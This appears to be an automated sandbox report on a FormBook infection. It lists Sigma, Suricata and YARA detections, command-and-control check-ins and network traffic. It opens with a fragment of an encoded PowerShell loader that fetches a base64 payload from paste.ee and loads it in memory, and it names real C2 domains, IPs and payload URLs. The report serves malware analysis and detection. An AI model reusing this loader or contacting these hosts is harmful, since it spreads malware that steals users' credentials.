t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7916, TargetFilename: C:\Users\user\AppData\Local\Temp\dll03.ps1
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5200, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-15T17:04:39.783436+020020507451Malware Command and Control Activity Detected192.168.2.84972481.176.66.17180TCP
                  2025-04-15T17:05:03.592953+020020507451Malware Command and Control Activity Detected192.168.2.849910199.59.243.22880TCP
                  2025-04-15T17:05:17.705442+020020507451Malware Command and Control Activity Detected192.168.2.84996684.32.84.3280TCP
                  2025-04-15T17:05:33.006054+020020507451Malware Command and Control Activity Detected192.168.2.84997066.29.132.10680TCP
                  2025-04-15T17:05:55.183755+020020507451Malware Command and Control Activity Detected192.168.2.849974209.74.64.18980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-15T17:04:06.342945+020020576351A Network Trojan was detected23.186.113.60443192.168.2.849698TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-15T17:04:05.898903+020028033053Unknown Traffic192.168.2.84969823.186.113.60443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-15T17:04:06.342945+020028582951A Network Trojan was detected23.186.113.60443192.168.2.849698TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-15T17:04:01.611181+020028410751Malware Command and Control Activity Detected192.168.2.84969423.186.113.60443TCP
                  2025-04-15T17:04:04.836508+020028410751Malware Command and Control Activity Detected192.168.2.84969623.186.113.60443TCP
                  2025-04-15T17:04:05.898903+020028410751Malware Command and Control Activity Detected192.168.2.84969823.186.113.60443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1258834116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1262010486.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.2232234775.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleNeural Call Log Analysis: 99.5%
                  Source: unknownHTTPS traffic detected: 104.22.69.199:443 -> 192.168.2.8:49693 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49694 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.22.69.199:443 -> 192.168.2.8:49695 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49696 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.8:49708 version: TLS 1.2
                  Source: Binary string: iexpress.pdbGCTL source: MSBuild.exe, 0000000A.00000002.1260131610.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000002.2228533425.00000000009EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000A.00000002.1263394109.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1261140619.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1259127486.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004F2E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.1263394109.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, iexpress.exe, 0000000C.00000003.1261140619.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1259127486.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004F2E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183432718.00000000003FF000.00000002.00000001.01000000.00000006.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2226912501.00000000003FF000.00000002.00000001.01000000.00000006.sdmp
                  Source: Binary string: iexpress.pdb source: MSBuild.exe, 0000000A.00000002.1260131610.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000002.2228533425.00000000009EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EDC9A0 FindFirstFileW,FindNextFileW,FindClose,12_2_02EDC9A0

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FF936859373h8_2_00007FF936859305
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FF93685BEE6h8_2_00007FF93685BE8A
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 4x nop then xor eax, eax12_2_02EC9DC0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 4x nop then mov ebx, 00000004h12_2_04CE04C0

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49724 -> 81.176.66.171:80
                  Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49910 -> 199.59.243.228:80
                  Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49974 -> 209.74.64.189:80
                  Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49970 -> 66.29.132.106:80
                  Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49966 -> 84.32.84.32:80
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 23.186.113.60:443 -> 192.168.2.8:49698
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 23.186.113.60:443 -> 192.168.2.8:49698
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: pastebin.com
                  Source: unknownDNS query: name: paste.ee
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: www.rtprubikslot-asli.xyz
                  Potential dropper URLs found in powershell memory
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmpString found in memory: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                  Source: powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /raw/naAgdcTG HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /r/eqs49sJc/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /raw/XHtEkzdv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /r/Iheui3WE/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /r/49ZDOxRT/0 HTTP/1.1Host: paste.ee
                  Source: Joe Sandbox ViewIP Address: 23.186.113.60 23.186.113.60
                  Source: Joe Sandbox ViewIP Address: 23.186.113.60 23.186.113.60
                  Source: Joe Sandbox ViewIP Address: 104.22.69.199 104.22.69.199
                  Source: Joe Sandbox ViewASN Name: RTCOMM-ASRU RTCOMM-ASRU
                  Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49694 -> 23.186.113.60:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49698 -> 23.186.113.60:443
                  Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49698 -> 23.186.113.60:443
                  Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49696 -> 23.186.113.60:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.60.201.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /raw/naAgdcTG HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /r/eqs49sJc/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /raw/XHtEkzdv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /r/Iheui3WE/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /r/49ZDOxRT/0 HTTP/1.1Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                  Source: global trafficHTTP traffic detected: GET /x6zj/?8ro=uF08wju0cXQ&3h5hA=pkzXSxPTT2YrTAYwTOcaicIRCimt47DVGFikR34exbY7UM7MJB5O+t5uY0YUTOYuZZ9XJQ2pXVe5ZrMcvuCkGXKDcloX44WZGHSYd2H3avFbIg3fwy0erPntJaR8L4pL1Q== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.samlib.ruConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global trafficHTTP traffic detected: GET /q311/?3h5hA=bke8j7cp8lJWsQ5WQiLuQmqBNA5ipjzHiB2sc2JWPfAhnYGd6znGVJIedsMDLkzs00I3QP9tMj756FQFYX4LVqe+kmGhFneDbc3KkqJedizo/c0Ucx4amu0gnd58xjoeBQ==&8ro=uF08wju0cXQ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.nkq.infoConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global trafficHTTP traffic detected: GET /x1ko/?8ro=uF08wju0cXQ&3h5hA=Mv2acbwiL4oNRjyGZZU1Zt7AVrfdhL7V4DwpB2S3Sz4/doIBMaaJL0B7TjNkp0qEn328fg/za7Woow3J3g5dySaE0ZjcX3AVAQmlCSx21G2meWoM1WEI2gYXBpvR5j2HSg== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.reviewsonline.shopConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global trafficHTTP traffic detected: GET /9oy0/?3h5hA=lky7435UELIKzB0myTA999dbf/jP++z67a9y8PRwl0eZ3Bm8hWcizV8nyFsUfJXeK9OG8/nicaY+NZ1XFddP2vRCJaEF5MEOHIiontz5u/RfGO1S6v6yaBBBtiXShFUgdA==&8ro=uF08wju0cXQ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.rtprubikslot-asli.xyzConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global trafficHTTP traffic detected: GET /r2h5/?3h5hA=8+IhhEvWUMhCGERLVzJwCdYPDDQ6Zj4bBkXGIcD1MTK6M4IbbHQVZI/CI3cKh6Yxaer0okw0YJR9Wy8gNiCXAEqY05WGIYHsJpMWKPMQ77csvWGmMwiL96d2TVFUIX/Ppw==&8ro=uF08wju0cXQ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.snappypeak.topConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: global trafficDNS traffic detected: DNS query: paste.ee
                  Source: global trafficDNS traffic detected: DNS query: c.pki.goog
                  Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
                  Source: global trafficDNS traffic detected: DNS query: www.samlib.ru
                  Source: global trafficDNS traffic detected: DNS query: www.nkq.info
                  Source: global trafficDNS traffic detected: DNS query: www.reviewsonline.shop
                  Source: global trafficDNS traffic detected: DNS query: www.rtprubikslot-asli.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.joebiden.baby
                  Source: global trafficDNS traffic detected: DNS query: www.snappypeak.top
                  Source: global trafficDNS traffic detected: DNS query: www.storii.shop
                  Source: unknownHTTP traffic detected: POST /q311/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.nkq.infoOrigin: http://www.nkq.infoReferer: http://www.nkq.info/q311/Cache-Control: max-age=0Content-Length: 206Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1Data Raw: 33 68 35 68 41 3d 57 6d 32 63 67 4d 41 59 37 48 39 6b 6c 6e 31 43 62 67 33 2f 58 42 47 78 4f 45 70 4c 6d 52 53 34 6c 6d 44 75 54 77 4e 67 4f 37 35 46 68 76 72 6c 72 51 66 6d 54 70 6b 37 44 76 74 79 4e 31 48 52 31 6c 56 44 65 74 64 54 58 68 33 68 67 33 5a 35 64 6d 4e 76 5a 6f 65 39 6c 6d 6a 2f 45 55 57 42 63 35 62 43 39 59 34 75 4b 67 65 76 30 35 4a 56 5a 69 67 47 6c 4d 4d 66 6b 6f 74 6c 35 45 77 53 61 65 30 55 7a 48 5a 5a 75 6f 69 46 54 54 62 55 43 41 5a 76 70 45 34 38 52 64 5a 56 78 32 34 48 61 7a 37 43 4f 30 35 77 48 49 4e 49 74 31 66 4b 74 56 37 73 71 63 76 52 4e 4e 4f 33 4c 45 50 34 71 63 52 39 65 30 45 3d Data Ascii: 3h5hA=Wm2cgMAY7H9kln1Cbg3/XBGxOEpLmRS4lmDuTwNgO75FhvrlrQfmTpk7DvtyN1HR1lVDetdTXh3hg3Z5dmNvZoe9lmj/EUWBc5bC9Y4uKgev05JVZigGlMMfkotl5EwSae0UzHZZuoiFTTbUCAZvpE48RdZVx24Haz7CO05wHINIt1fKtV7sqcvRNNO3LEP4qcR9e0E=
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 15 Apr 2025 15:05:23 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
